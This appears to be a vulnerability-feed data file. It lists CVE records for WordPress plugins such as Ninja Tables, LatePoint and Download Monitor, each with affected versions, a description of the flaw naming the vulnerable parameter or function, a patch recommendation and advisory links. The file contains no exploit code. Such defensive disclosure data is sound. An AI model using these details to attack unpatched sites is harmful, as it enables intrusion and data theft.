{"CVE_ID":"CVE-2025-2940","slug":"ninja-tables","versionImpact":"5.0.18","versionEndExcluding":"5.0.19","description":"The Ninja Tables \u2013 Easy Data Table Builder plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.18 via the args[url] parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 5.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3269692%40ninja-tables&new=3269692%40ninja-tables&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3269692%40ninja-tables&new=3269692%40ninja-tables&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02480559-be5c-4d23-9e62-bb76fafb4f42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02480559-be5c-4d23-9e62-bb76fafb4f42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2939","slug":"ninja-tables","versionImpact":"5.0.18","versionEndExcluding":"5.0.19","description":"The Ninja Tables \u2013 Easy Data Table Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.0.18 via deserialization of untrusted input from the args[callback] parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute arbitrary functions, though it does not allow user-supplied parameters; only single functions can be called, so the impact is limited.","recommendation":"Update to version 5.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e38553d-5dba-4c84-95f7-43420245c770?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e38553d-5dba-4c84-95f7-43420245c770?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12772","slug":"ninja-tables","versionImpact":"5.0.16","versionEndExcluding":"5.0.17","description":"The Ninja Tables  WordPress plugin before 5.0.17 does not sanitize and escape a parameter before outputting it back in the page when importing a CSV, leading to a Cross Site Scripting vulnerability.","recommendation":"Update to version 5.0.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b6d0f95-6632-4079-8c1b-517a8d02c330\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b6d0f95-6632-4079-8c1b-517a8d02c330\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10399","slug":"download-monitor","versionImpact":"5.0.13","versionEndExcluding":"5.0.14","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_search_users function in all versions up to, and including, 5.0.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain usernames and emails of site users.","recommendation":"Update to version 5.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b88862-012a-4dc6-9abb-99dc0d9408fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b88862-012a-4dc6-9abb-99dc0d9408fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.13\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.13\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178099\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178099\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25217","slug":"sg-cachepress","versionEndExcluding":"5.0.13","description":"The SiteGround Optimizer plugin for WordPress is vulnerable to authorization bypass leading to Remote Code Execution and Local File Inclusion in versions up to, and including, 5.0.12 due to incorrect use of an access control attribute on the switch_php function called via the \/switch-php REST API route. This allows attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657f3bd7-2cdc-4eb6-ba50-7c7fca468df0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657f3bd7-2cdc-4eb6-ba50-7c7fca468df0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/03\\\/vulnerability-disclosure-siteground-optimizer-caldera-forms.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/03\\\/vulnerability-disclosure-siteground-optimizer-caldera-forms.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8943","slug":"latepoint","versionImpact":"5.0.12","versionEndExcluding":"5.0.13","description":"The LatePoint plugin for WordPress is vulnerable to authentication bypass in versions up to, and including,  5.0.12. This is due to insufficient verification on the user being supplied during the booking customer step. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. Note that logging in as a WordPress user is only possible if the \"Use WordPress users as customers\" setting is enabled, which is disabled by default. The vulnerability is partially patched in version 5.0.12 and fully patched in version 5.0.13.","recommendation":"Update to version 5.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bac8c35b-2afa-4347-b86e-2f16db19a4d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bac8c35b-2afa-4347-b86e-2f16db19a4d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10092","slug":"download-monitor","versionImpact":"5.0.12","versionEndExcluding":"5.0.13","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_handle_api_key_actions function in all versions up to, and including, 5.0.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to revoke existing API keys and generate new ones.","recommendation":"Update to version 5.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e50d8c-e61c-4e94-b5e8-b24832dc24b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e50d8c-e61c-4e94-b5e8-b24832dc24b6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.12\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.12\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173614\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173614\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8911","slug":"latepoint","versionImpact":"5.0.11","versionEndExcluding":"5.0.12","description":"The LatePoint plugin for WordPress is vulnerable to Arbitrary User Password Change via SQL Injection in versions up to, and including, 5.0.11. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note that changing a WordPress user's password is only possible if the \"Use WordPress users as customers\" setting is enabled, which is disabled by default. Without this setting enabled, only the passwords of plugin customers, which are stored and managed in a separate database table, can be modified.","recommendation":"Update to version 5.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c9a23a3-5eb5-4f5b-bf32-c9d163426f29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c9a23a3-5eb5-4f5b-bf32-c9d163426f29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8552","slug":"download-monitor","versionImpact":"5.0.9","versionEndExcluding":"5.0.10","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the enable_shop() function in all versions up to, and including, 5.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable shop functionality.","recommendation":"Update to version 5.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3acaedff-f616-4b66-9208-f7e6a4df920d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3acaedff-f616-4b66-9208-f7e6a4df920d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.8\\\/src\\\/AjaxHandler.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.8\\\/src\\\/AjaxHandler.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157424\\\/#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157424\\\/#file17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5654","slug":"cf7-google-sheets-connector","versionImpact":"5.0.9","versionEndExcluding":"5.0.10","description":"The CF7 Google Sheets Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'execute_post_data_cg7_free' function in all versions up to, and including, 5.0.9. This makes it possible for unauthenticated attackers to toggle site configuration settings, including WP_DEBUG, WP_DEBUG_LOG, SCRIPT_DEBUG, and SAVEQUERIES.","recommendation":"Update to version 5.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0da4d55-5025-47cf-9f45-377d8943fc94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0da4d55-5025-47cf-9f45-377d8943fc94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-google-sheets-connector\\\/trunk\\\/includes\\\/class-gs-service.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-google-sheets-connector\\\/trunk\\\/includes\\\/class-gs-service.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099184\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099184\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4598","slug":"wp-slimstat","versionImpact":"5.0.9","versionEndExcluding":"5.0.10","description":"The Slimstat Analytics plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 5.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07c0f5a5-3455-4f06-b481-f4d678309c50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07c0f5a5-3455-4f06-b481-f4d678309c50?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.8\\\/admin\\\/view\\\/wp-slimstat-db.php#L970\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.8\\\/admin\\\/view\\\/wp-slimstat-db.php#L970\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6923","slug":"matomo","versionEndExcluding":"5.0.1","description":"The Matomo Analytics \u2013 Ethical Stats. Powerful Insights. plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the idsite parameter in all versions up to, and including, 4.15.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e2d54eb-c176-49c4-a4fc-833e17189cad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e2d54eb-c176-49c4-a4fc-833e17189cad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031495%40matomo&new=3031495%40matomo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031495%40matomo&new=3031495%40matomo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12737","slug":"wp-base-booking-of-appointments-services-and-events","versionImpact":"4.9.2","versionEndExcluding":"5.0.0","description":"The WP BASE Booking of Appointments, Services and Events WordPress plugin before 5.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/997eb9f6-80e1-4bc5-be72-bd6a6f52379c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/997eb9f6-80e1-4bc5-be72-bd6a6f52379c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12558","slug":"wp-base-booking-of-appointments-services-and-events","versionImpact":"4.9.2","versionEndExcluding":"5.0.0","description":"The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/4.9.2\\\/includes\\\/freeons\\\/export-import.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/4.9.2\\\/includes\\\/freeons\\\/export-import.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210164\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/5.0.0\\\/includes\\\/freeons\\\/export-import.php?old=3207827&old_path=wp-base-booking-of-appointments-services-and-events%2Ftags%2F4.9.2%2Fincludes%2Ffreeons%2Fexport-import.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210164\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/5.0.0\\\/includes\\\/freeons\\\/export-import.php?old=3207827&old_path=wp-base-booking-of-appointments-services-and-events%2Ftags%2F4.9.2%2Fincludes%2Ffreeons%2Fexport-import.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09831b2f-8f79-4833-8fc6-f1af56c6abc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09831b2f-8f79-4833-8fc6-f1af56c6abc8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13439","slug":"tlp-team","versionImpact":"4.4.9","versionEndExcluding":"5.0.0","description":"The Team \u2013 Team Members Showcase Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the response() function in all versions up to, and including, 4.4.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-team\\\/tags\\\/4.4.7\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-team\\\/tags\\\/4.4.7\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Skill.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Skill.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239948%40tlp-team&new=3239948%40tlp-team&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239948%40tlp-team&new=3239948%40tlp-team&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46951d8d-f8f1-4fb5-b02a-1a19edd154e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46951d8d-f8f1-4fb5-b02a-1a19edd154e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12415","slug":"infographic-and-list-builder-ilist","versionImpact":"4.9.0","versionEndExcluding":"5.0.0","description":"The The AI Infographic Maker plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.9.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/embed\\\/qcld-embed-link.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/embed\\\/qcld-embed-link.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210519%40infographic-and-list-builder-ilist&new=3210519%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=#file1030\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210519%40infographic-and-list-builder-ilist&new=3210519%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=#file1030\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227956%40infographic-and-list-builder-ilist&new=3227956%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227956%40infographic-and-list-builder-ilist&new=3227956%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa21fad-4dd0-4ccd-a325-de3532a6ffaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa21fad-4dd0-4ccd-a325-de3532a6ffaf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1995","slug":"smart-custom-fields","versionImpact":"4.2.2","versionEndExcluding":"5.0.0","description":"The Smart Custom Fields plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relational_posts_search() function in all versions up to, and including, 4.2.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve post content that is password protected and\/or private.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e966a266-4265-4a72-8a50-e872805219a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e966a266-4265-4a72-8a50-e872805219a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-custom-fields\\\/trunk\\\/classes\\\/fields\\\/class.field-related-posts.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-custom-fields\\\/trunk\\\/classes\\\/fields\\\/class.field-related-posts.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/inc2734\\\/smart-custom-fields\\\/commit\\\/67cb6d75bd8189668f721dbd2dc7a3036851be1b\",\"name\":\"https:\\\/\\\/github.com\\\/inc2734\\\/smart-custom-fields\\\/commit\\\/67cb6d75bd8189668f721dbd2dc7a3036851be1b\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1642","slug":"mainwp","versionImpact":"4.6.0.1","versionEndExcluding":"5.0","description":"The MainWP Dashboard  \u2013 WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.0.1. This is due to missing or incorrect nonce validation on the 'posting_bulk' function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.0, or a newer patched 